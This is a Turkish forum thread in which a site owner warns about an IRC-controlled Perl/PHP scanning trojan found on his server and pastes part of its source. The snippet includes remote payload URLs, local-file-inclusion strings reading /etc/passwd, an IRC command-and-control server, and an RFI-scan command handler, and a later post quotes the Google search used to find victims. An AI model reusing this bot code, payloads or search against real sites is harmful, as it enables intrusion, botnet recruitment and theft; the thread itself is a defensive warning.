Dikkat, farklı bir TROJAN!

[SavaS]

Selam,

Sitemin biri için "RSA Anti-Fraud Command Center
(afcc@rsasecurity.com)" adresinden bir mail gelmiş geçen gün. Mailde sitemin birinde bilgim dışında biri trojan scan ettiriyormuş. (Adresi vermeyeceğim güvenlik açısından.)

Bu virüs, sitemin chmodu 777 olan bir klasöre bir şekilde bulaştırılmış, perl ve php kodlarıyla yazılmış IRC üzerinden yönetilen bir oto-scan trojan/virüstür.

RSA nın belirttiği dosyanın bulunduğu klasöre baktığımda 10-20 arası dosya bulunmaktaydı. Silmeye çalıştığımda ise, bir kaçı silinmedi. Silinmeyen dosyaların birinin içinde;

Kod:

#################
#[Configuration]#
#################
my $response = "http://www.zinforma.com/arab.txt"; # included in zip as response.txt
my $test = "http://need-this.info/pretty/234/control/id2.txt"; # included in zip as test.txt
my $printcmd = "-=Hidup Hanya Sebuah Ilusi=-";
my $responselfi = "/../../../../../../../../etc/passwd";
my $printcmdlfi = "/../../../../../../../../etc/passwd";
my $spread = "http://www.teste.dark-hosting.be/mohaa/echo.txt";
my $nickname = "TDO^Scan".(int(rand(999)));
my $ident = "racrew";
my $channel = "#tondano";
my $server = "irc.racrew.us";
my $port = 6667;
#################
#[Configuration]#
#################

my $sock;
my $exploitcounter = 100;
my @User_Agent = &Agent();
my $pid = fork();
if($pid==0){
 &connectirc($nickname,$ident,$channel,$server,$port);
}else{
 exit(0);
}

sub connectirc(){
 my($nickname,$ident,$channel,$server,$port)=@_;
 $sock = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$server",PeerPort=>$port);
 $sock->autoflush(1);
 print $sock "NICK ".$nickname."\r\n";
 print $sock "USER ".$ident." 8 * : r@cRew \r\n";
 print $sock "JOIN ".$channel."\r\n";
 while( $command = <$sock> ){

if($command =~ /\!rfi\s+(.*?)\s+(.*)/){
 if(fork() == 0){
  my($bug,$dork)=($1,$2);
  &scan($bug,$dork);
   exit(0);
 }
}

Şeklinde devam eden bir kod buldum. Bu trojanın kontrolü irc.racrew.us sunucusundaki yöneticiler (mi desem artık user mi desem) tarafından yapılıyor.

Sunucuya girip nelerin olup bittiğine bakabilirsiniz.

Sunucularınızdaki güvenliği arttırmanız tavsiye edilir.

Bu arada trojanı bhlynx script yardımıyla çoğaltıyorlar sanırım.

[SavaS]

Bu arada biraz gözlem yaptımda,

sistem çok gelişmiş. Google'dan aşağıdaki aramayı yaparak açığı olanlara otomatikmen bulaşıyor.

Alıntı:

allinurl:vwar site:.com

google'da yukarıdaki kodu arasanıza karşınıza ne çıkacak

[SavaS]

Ayrıyetten, bu virüsü yayan kişi, paypal hesaplarınızı çalabiliyor, httpdflood, udpflood, tcpflood, portscan türü şeylerde yapabiliyor.

Virüsü yayan kişinin mail adresini buldum sanırım.

[SavaS]

hiçkimsenin bu konu hakkında bilgisi yok sanırım

Botu çoğaltan kişiler endonezyalılarmış.

[madeinclick.com]

ORMAN çocukları !!